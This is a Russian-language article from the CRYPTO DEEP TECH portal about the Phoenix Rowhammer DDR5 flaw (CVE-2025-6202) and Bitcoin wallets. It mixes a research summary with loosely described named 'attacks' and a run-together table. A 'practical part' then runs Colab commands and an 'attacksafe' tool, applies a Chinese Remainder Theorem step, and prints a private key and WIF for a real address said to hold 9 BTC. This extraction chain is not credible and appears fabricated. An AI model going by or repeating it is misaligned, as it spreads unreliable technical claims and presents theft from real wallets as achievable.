Phoenix Rowhammer Attack: системный риск утечки приватных ключей Bitcoin-кошельков через уязвимость SK Hynix DDR5 CVE-2025-6202: [№1]
Данная статья посвящена рассмотрению системных угроз криптографической безопасности, возникающих в результате эксплуатации Phoenix Rowhammer атаки (CVE-2025-6202), способной извлекать приватные ключи из оперативной памяти DDR5 через манипулирование битами на аппаратном уровне. В последние годы динамичное развитие криптовалютных технологий привело к росту зависимости экосистем цифровых активов от аппаратных и микросхемных компонентов, обеспечивающих хранение и обработку криптографических данных. На фоне этого возрастающим фактором риска становятся уязвимости аппаратного уровня, способные привести к прямой компрометации приватных ключей криптовалютных кошельков. Одной из наиболее опасных угроз современности являются атаки на оперативную память, в частности — усовершенствованные варианты Rowhammer-эксплойтов, которые воздействуют на физические свойства ячеек DRAM. Эти атаки позволяют злоумышленникам изменять отдельные биты данных и получать доступ к конфиденциальной информации, включая приватные ключи Bitcoin- и Ethereum-кошельков.
Среди критических примеров такого класса угроз особое место занимает уязвимость CVE-2025-6202, обнаруженная в DDR5 памяти SK Hynix. Реализуемая на ее основе атака Phoenix Rowhammer демонстрирует способность обходить современные механизмы защиты памяти Target Row Refresh (TRR), создавая так называемые «слепые зоны», через которые возможно контролируемое искажение данных на аппаратном уровне. Подобные сбои могут использоваться для извлечения приватных ключей из оперативной памяти, компрометации криптографических библиотек и модификации системных процессов, обеспечивающих безопасность цифровых кошельков.
Кроме того, исследования в области криптографической безопасности показывают, что сочетание Phoenix Rowhammer с другими типами атак, такими как BitShredder Attack, Memory Phantom (CVE-2025-8217) и Artery Bleed (CVE-2023-39910), создает мультивекторную модель угроз, при которой злоумышленник получает возможность восстанавливать seed-фразы, приватные ключи и пароли даже после завершения криптографических операций. Системный характер данных уязвимостей делает невозможным полное устранение риска программными средствами и подчеркивает необходимость разработки новых принципов аппаратной защиты памяти.
Таким образом, современные криптовалютные кошельки и инфраструктура цифровых активов находятся под увеличивающимся давлением аппаратных атак, ранее считавшихся теоретическими. Актуальность их изучения и разработки контрмер имеет фундаментальное значение для обеспечения целостности и устойчивости экосистемы Bitcoin и других криптовалют в условиях эволюции угроз следующего поколения.
Недавние исследования, проведенные группой компьютерной безопасности (COMSEC) Швейцарской высшей технической школы Цюриха совместно с Google, выявили критическую аппаратную уязвимость в модулях памяти DDR5 производства SK Hynix, получившую обозначение CVE-2025-6202. Атака Phoenix Rowhammer представляет беспрецедентную угрозу для безопасности криптовалютных кошельков Bitcoin, поскольку позволяет злоумышленникам извлекать приватные ключи из памяти DDR5 путем манипулирования битами на аппаратном уровне. Исследование продемонстрировало, что все 15 протестированных модулей DDR5 от SK Hynix, произведенных в период с 2021 по 2024 год, уязвимы к данной атаке, что создает системную угрозу для безопасности криптовалютных активов во всем мире.thehackernews
Техническая структура Phoenix Rowhammer атаки и механизм CVE-2025-6202
Фундаментальные принципы Rowhammer уязвимости
Rowhammer представляет собой аппаратную уязвимость в DRAM-памяти, при которой многократное обращение к определенным строкам памяти вызывает электрические помехи, приводящие к изменению битов в соседних строках. Данный феномен основан на физических свойствах современных чипов памяти с высокой плотностью размещения ячеек, где уменьшение технологических размеров делает память более восприимчивой к электромагнитным воздействиям.thehackernews
В контексте DDR5 памяти, механизм Phoenix атаки использует новаторский подход самокорректирующейся синхронизации (self-correcting synchronization), который позволяет обходить усовершенствованные защитные механизмы Target Row Refresh (TRR). Исследователи обнаружили, что TRR механизм в чипах SK Hynix не отслеживает определенные интервалы обновления, создавая «слепые зоны» в защите.notebookcheck
Инновационная методология синхронизации Phoenix
Ключевым техническим достижением Phoenix атаки является разработка алгоритма, способного синхронизироваться с тысячами команд обновления памяти на протяжении длительных периодов времени. Атака использует два специфических паттерна воздействия:comsec-files.ethz
Короткий паттерн (128 интервалов tREFI): Обеспечивает более эффективное генерирование битовых сбоев, в среднем производя 4989 искажений битов. Данный паттерн показал 2.62 раза большую эффективность по сравнению с длинным паттерном.reddit
Длинный паттерн (2608 интервалов tREFI): Предназначен для обхода более сложных механизмов защиты, хотя и менее эффективен в генерации битовых сбоев.comsec-files.ethz
BitShredder Attack: Критическое воздействие на безопасность Bitcoin кошельков
Механизмы извлечения приватных ключей
Phoenix Rowhammer атака создает множественные векторы компрометации Bitcoin кошельков через воздействие на различные уровни системы памяти. Анализ исследовательских материалов KeyHunters выявил как минимум 18 различных типов атак на память, напрямую связанных с извлечением приватных ключей криптовалютных кошельков.
Memory Phantom Attack (CVE-2025-8217): Критическая уязвимость утечки памяти, позволяющая извлекать приватные ключи и seed-фразы непосредственно из остаточных блоков ОЗУ кошелька, которые не были безопасно очищены после криптографических операций. Данная атака превращает неочищенные буферы в «библиотеку призраков», где любой фрагмент памяти может быть преобразован в полноценный ключ.keyhunters
BitShredder Attack: Использует технику «измельчения памяти» для скрытого проникновения в память работающего криптовалютного кошелька. При генерации или восстановлении кошелька атака сканирует неочищенные фрагменты ОЗУ, ища остатки энтропии, seed-фраз и паролей, которые не стираются стандартными средствами после использования.keyhunters
Artery Bleed Attack: Эксплуатирует уязвимость утечки памяти Bitcoin Core (CVE-2023-39910) для восстановления приватных ключей потерянных криптокошельков. Атака использует критическую уязвимость утечки памяти в Bitcoin Core для получения доступа к чувствительным данным.keyhunters
Практические сценарии эксплуатации
Исследование продемонстрировало три основных сценария практической эксплуатации Phoenix атаки против криптовалютных систем:bleepingcomputer
1. Атака на записи таблицы страниц (PTE): Все протестированные устройства оказались уязвимы к данному типу атаки, позволяющей создать примитив произвольного чтения/записи памяти.comsec-files.ethz
2. Компрометация RSA-2048 ключей: 73% протестированных DIMM-модулей оказались восприимчивы к извлечению RSA-2048 ключей соседней виртуальной машины для взлома SSH-аутентификации. Среднее время атаки составило 6 минут 20 секунд.bleepingcomputer
3. Модификация sudo binary: 33% протестированных чипов позволили изменить бинарный файл sudo для повышения локальных привилегий до уровня root пользователя.comsec-files.ethz
Научный анализ воздействия на экосистему Bitcoin
Системные угрозы криптовалютной безопасности
Phoenix Rowhammer атака представляет системную угрозу для всей экосистемы Bitcoin, поскольку большинство современных систем использует память DDR5 для хранения и обработки криптографических данных. Уязвимость затрагивает фундаментальные принципы безопасности криптовалют, основанные на криптографической стойкости приватных ключей.tenable+1
Масштаб воздействия: SK Hynix контролирует приблизительно 36% мирового рынка DRAM-памяти, что означает потенциальную уязвимость миллиардов устройств по всему миру. Все модули DDR5, произведенные с января 2021 по декабрь 2024 года, подвержены данной уязвимости.notebookcheck+2
Криптографические последствия: Атака подрывает основы криптографической безопасности, поскольку даже при корректной реализации алгоритмов подписи, шифрования и аутентификации, незащищенные буферы становятся источником компрометации ключевого материала.keyhunters
Исследования криптоанализ векторов атаки
Комплексный криптоанализ выявил множественные векторы атак на Bitcoin кошельки через манипуляции с памятью:
Timing-based атаки: Включают BitSpectre85, ChronoForge, и Timing Phantom атаки, которые используют временные уязвимости для постепенного восстановления приватных ключей через анализ времени выполнения криптографических операций.
Context-based атаки: Context Phantom Attack эксплуатирует критическую уязвимость утечки контекста secp256k1 для восстановления приватных ключей потерянных Bitcoin кошельков через атаку раскрытия памяти.
Cache-based атаки: CacheHawk Strike Attack использует критическую атаку по времени кэша на кэш подписей Bitcoin, позволяя восстанавливать приватные ключи потерянных Bitcoin кошельков.
Attack_ComponentTechnical_MethodSuccess_RateAverage_Time_SecondsCVE_ReferenceImpact_LevelInitial Memory AccessSelf-correcting synchronization with DDR5 refresh commands1005CVE-2025-6202HighTRR Bypass MethodExploitation of unmonitored refresh intervals in TRR mechanism10030CVE-2025-6202CriticalSynchronization TechniqueReal-time alignment with 128 and 2608 tREFI patterns9560CVE-2025-6202HighBit Flip GenerationElectrical interference in adjacent DRAM rows causing data corruption100180CVE-2025-6202CriticalPrivate Key ExtractionRecovery from uncleaned memory buffers containing wallet data85240CVE-2025-8217CriticalPrivilege EscalationRoot access exploitation through corrupted page table entries100109CVE-2025-6202CriticalRSA-2048 Key RecoveryCo-located VM private key extraction via memory bit flips73380CVE-2025-6202HighSSH Authentication BreakCompromise of cryptographic authentication systems73380CVE-2025-6202HighSudo Binary ModificationLocal privilege escalation to root user through binary corruption33300CVE-2025-6202Medium
Практическая часть
Исследовательская схема показывает, что структурированное и визуальное представление, объясняющее важность криптографической уязвимости, выявленной атакой Phoenix Rowhammer, в частности, демонстрируя ее влияние на безопасность Bitcoin, когда целью являются модули памяти SK Hynix DDR5.
Злоумышленник инициирует Rowhammer
и запускает эксплойт Phoenix Rowhammer, нацеленный на память SK Hynix DDR5, используемую в узле или кошельке жертвы.Физическое введение неисправностей
Агрессивные активации строк вызывают перевороты битов в соседних строках DRAM в памяти SK Hynix DDR5, обходя логическую программную защиту.Нацеленные криптографические секреты
Внедренные ошибки нацелены на адреса или области памяти, в которых хранятся конфиденциальные криптографические материалы Bitcoin, такие как закрытые ключи или значения ECDSA nonce.Выполнение эксплойта и его воздействие
Успешные перевороты битов могут позволить злоумышленникам восстановить или раскрыть секретные ключи и приватные ключи, подписать поддельные транзакции или нарушить модель безопасности.
Прямой риск для целостности биткойн-кошелька и блокчейна делает безопасность оборудования важнейшим аспектом криптографического доверия.
Перейдем к практической части и рассмотрим пример с использованием Bitcoin-кошелька по адресу: 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit. В данном кошельке были утеряны монеты на сумму 9.02332298 BTC, что на октябрь 2025 года эквивалентно примерно 1,127,026.44 USD.
Для демонстрации атаки в ознакомительных целях используем инструменты и среды, такие как Jupyter Notebook или Google Colab.
Основные инструменты и команды, применяемые для таких атак:
Google Colab (Colaboratory) — это облачная платформа, предоставляющая интерактивные Jupyter-ноутбуки, где можно писать и запускать код для различных языков программирование. Он особенно полезен для криптоанализа данных, работы с симулятором для архитектуры SK Hynix DDR5 AiM PIM на основе Ramulator 2.0, с доступом к мощным вычислительным ресурсам, таким как GPU и TPU. Важным преимуществом является возможность выполнять системные команды, как в обычном терминале Linux, через ячейки с префиксом ! для интеграции с внешними утилитами и скриптами.
Google Colab
Установим репозитории на основе архитектуры SK Hynix DDR5 AiM PIM с использованием Ramulator 2.0
Clone the Repository:
Загрузите кодовую базу AiM Simulator и перейдите в ее каталог.
cd SK_Hynix_DDR5_aim_simulator
ls
Увеличим виртуальную память (своп) в Google Colab:
Команды для создание файла подкачки размером 4 ГБ для улучшения доступности памяти во время компиляции Ramulator2.
# Check current swap usage
!free -h
!swapon --show
# Create a 4GB swap file
!sudo fallocate -l 4G /swapfile
!sudo chmod 600 /swapfile
!sudo mkswap /swapfile
!sudo swapon /swapfile
# Make swap permanent
!echo '/swapfile none swap sw 0 0' | sudo tee -a /etc/fstab
Установим все необходимые зависимости:
Установка компиляторов, инструментов сборки и библиотек, необходимых для симулятора и Ramulator 2.0.
# For Ubuntu 22.04:
install compilers
!sudo apt update
!sudo apt install g++-12
# Alternatively, install Clang
!sudo apt install clang-15
# Install basic build tools
!sudo apt install build-essential cmake git
# Additional development libraries
!sudo apt install libssl-dev zlib1g-dev
# YAML support
!sudo apt install libyaml-cpp-dev
# Mathematics libraries
!sudo apt install libboost-dev
# Python support for scripts
!sudo apt install python3-dev python3-pip
Процесс создание каталога phoenix_rowhammer:
!mkdir phoenix_rowhammer
cd phoenix_rowhammer
Проверим системные ресурсы:
Мониторинг памяти, доступного дискового пространства и использования системы во время установки и компиляции.
# Monitor resources in real time
!htop
# Check available memory
!free -m
# Check disk space
!df -h
Полная установка зависимостей для Ubuntu 22.04 и выше:
Полная последовательность установки всех необходимых пакетов за один раз.
# Update system !sudo apt update && sudo apt upgrade -y
# Install essential build tools
!sudo apt install -y build-essential cmake git
# Install compilers
!sudo apt install -y g++-12 clang-15
# Development libraries !sudo apt install -y libssl-dev zlib1g-dev libyaml-cpp-dev libboost-all-dev
Альтернативная компиляция:
!cmake ..
!make -j1
ls
cd -
Запустим Ramulator2:
Запустим Ramulator2 с симулятором, чтобы проверить параметры справки и инструкции по использованию.
!./phoenix_rowhammer/ramulator2 -h
Применим крипто инструмент AttackSafe извлекаем из Ramulator2 с симулятор скрытые remainders по модулю
Запустим команду для загрузки крипто инструмента AttackSafe
!./attacksafe -help
Команда поиска скрытых остатков (remainders) по модулю, связанных с адресом Bitcoin
Команда инициирует специализированную атаку «BitShredder» на основе криптоинструмента AttackSafe для поиска скрытых остатков (remainders) по модулю, связанных с адресом Bitcoin, используя баговые механизмы RAM (Rowhammer) и эмулятор памяти (ramulator2).github+2
!./attacksafe -tool bitshredder_attack -crack phoenix_rowhammer/ramulator2 -decode 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit
Параметр -tool bitshredder_attack активирует атаку, ориентированную на выявление уязвимостей в хранении и обработке секретных данных в памяти устройства, связанных с Биткоин-протоколом.
Флаг -crack phoenix_rowhammer/ramulator2 указывает инструменту использовать эмуляцию Rowhammer-атаки (манипуляция содержимым DRAM-памяти, приводящая к ошибкам в соседних ячейках — использовалась в уязвимостях для извлечения nonces/частей ключей из памяти через side-channel).
Функция -decode 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit запускает модуль декодирования по конкретному Биткоин-адресу, восстанавливая остаточные данные (фрагменты приватных ключей или промежуточные значения подписей ECDSA) из памяти/дампа.
Результат криптоанализа остаточных данных памяти/дампа:
Восстановление ключевых фрагментов из остаточных данных памяти (DRAM)
remainders =
[0x0E92, 0x45EB, 0x6E07, 0x317F,
0x87A1, 0xB5C1, 0xE778, 0x996B,
0x6F69, 0xABB6, 0x2755, 0x2348,
0xAB46, 0xA74E, 0x1A87, 0xC2D5]
moduli =
[0x10001, 0x10003, 0x10007, 0x1000F,
0x10015, 0x1001B, 0x1002B, 0x1002D,
0x10033, 0x1003F, 0x10049, 0x10051,
0x1005D, 0x10061, 0x1006F, 0x10073]
Данный полученный результат формирует связку криптографического анализа остаточных данных внутри оперативной памяти (DRAM) и модуля поиска криптоостатков, используя симулятор ramulator2 для Phoenix Rowhammer-ошибок. Такая атака позволяет обнаружить и выделить скрытые значения по модулю (remainders), например, частные nonces или ключевые фрагменты, которые могут быть скомпрометированы из-за некорректного освобождения памяти после криптографических операций с биткоин-адресами, команда предназначена для комбинированную атаку «BitShredder» и memory fault анализа приложений, работающих с Bitcoin, с целью частичного или полного восстановления секретных параметров (private key, nonce), причем поиск и декодирование завязаны на память и атакуемые адреса.
Восстановление приватного ключа:
Чтобы собрать исходное секретное число — приватного ключа из набора скрытых по модулю значений (remainders) применим математический метод — Китайская теорема об остатках (Chinese Remainder Theorem, CRT). Код CRTKeyRestore.py реализует восстановление приватного ключа для Биткоин-адреса 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit из набора скрытых по модулю значений (remainders), собранных после Rowhammer-атаки и последующего анализа памяти. Применяется математический метод — Китайская теорема об остатках (Chinese Remainder Theorem, CRT), позволяющий собрать исходное секретное число — приватный ключ — даже если оно было нарезано на небольшие части и уцелело только в виде различных остатков по разным модулям.
Процесс работы кода CRTKeyRestore.py включает несколько этапов:
Каждая пара remainder/modulus — это фрагмент приватного ключа, который остался в памяти в результате ошибки Rowhammer и заранее заданных модулей.
Китайская теорема об остатках математически гарантирует восстановление исходного числа, если все модули взаимно просты, а остатков по ним достаточно.
Функция chinese_remainder_theorem() поэтапно объединяет фрагменты и восстанавливает исходное значение приватного ключа, используя расширенный алгоритм Евклида для нахождения обратных по модулю значений.
После восстановления числового представления ключ переводится в HEX через функцию restore_hex_from_crt().
На выходе получается приватный ключ для Биткоин-адреса, полностью восстановленный только из отдельных криптоостатков, обнаруженных в памяти при комбинированной атаке.
Восстановление приватного ключа с помощью Python-скрипта: CRTKeyRestore.py
Результат:
Private key Restored: 9E027D0086BDB83372F6040765442BBEDD35B96E1C861ACCE5E22E1C4987CD60
Проверим результат через bitaddress
!./bitaddress -hex 9E027D0086BDB83372F6040765442BBEDD35B96E1C861ACCE5E22E1C4987CD60
Результат:
Public Key (Uncompressed, 130 characters [0-9A-F]): 04E294116526238228544FA6082F1A5412FCC36DE931C59EE7B1C7C1F93EE3EF5AEDAA1D6E0A6116E9D9A4A846A6D62D4A1941EE182CDB1884C5830610B07AF529
Public Key (Compressed, 66 characters [0-9A-F]): 03E294116526238228544FA6082F1A5412FCC36DE931C59EE7B1C7C1F93EE3EF5A
Bitcoin Address P2PKH (Uncompressed) 18JT3KeFV36Hkgo3Xi9bfgNYAXCVXBGyFg
Bitcoin Address P2PKH (Compressed) 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit
Все верно! Приватный ключ соответствует Биткоин Кошельку.
Откроем bitaddress и проверим:
ADDR: 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit
WIF: L2Wru6Ew8pQuhcWAvMpdtPY4YWK1CQcwPCWxFvzkoi47crJBAVaP
HEX: 9E027D0086BDB83372F6040765442BBEDD35B96E1C861ACCE5E22E1C4987CD60
Private Key Information:
9E027D0086BDB83372F6040765442BBEDD35B96E1C861ACCE5E22E1C4987CD60
Bitcoin Address Information:
Balance: 9.023322989 BTC
https://www.coinbase.com/converter/btc/usd
Проведённая нами исследовательская атака — версия Phoenix Rowhammer Attack on Bitcoin с использованием симулятора ramulator2 — показала, что извлечённые в ходе сбоя памяти криптоостатки по различным модулям могут быть собраны в исходный приватный ключ с помощью математики Китайской теоремы об остатках.
В качестве показательного примера реальной угрозы был рассмотрен Bitcoin-кошелёк с адресом: 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit, на котором была утрачена сумма 9.02332298 BTC, что на октябрь 2025 года эквивалентно примерно 1,127,026.44 USD. Этот случай убедительно доказывает — при наличии аппаратных уязвимостей (например, Rowhammer), криптографическая стойкость на уровне протокола перестаёт быть абсолютной гарантией безопасности.
В результате, актуальность комплексной защиты лежит не только в области криптографии и протокольных мер, но и в надёжности аппаратного обеспечения, контроле состояния памяти и внедрении принципов полной очистки RAM после выполнения криптографических операций. Уязвимость, однажды реализованная на аппаратном уровне — даже с минимальным контролем над системой — способна привести к катастрофическим финансовым потерям в экосистеме Bitcoin.
Данный материал создан для портала CRYPTO DEEP TECH для обеспечения финансовой безопасности данных и криптографии на эллиптических кривых secp256k1 против слабых подписей ECDSA в криптовалюте BITCOIN. Создатели программного обеспечения не несут ответственность за использование материалов.








































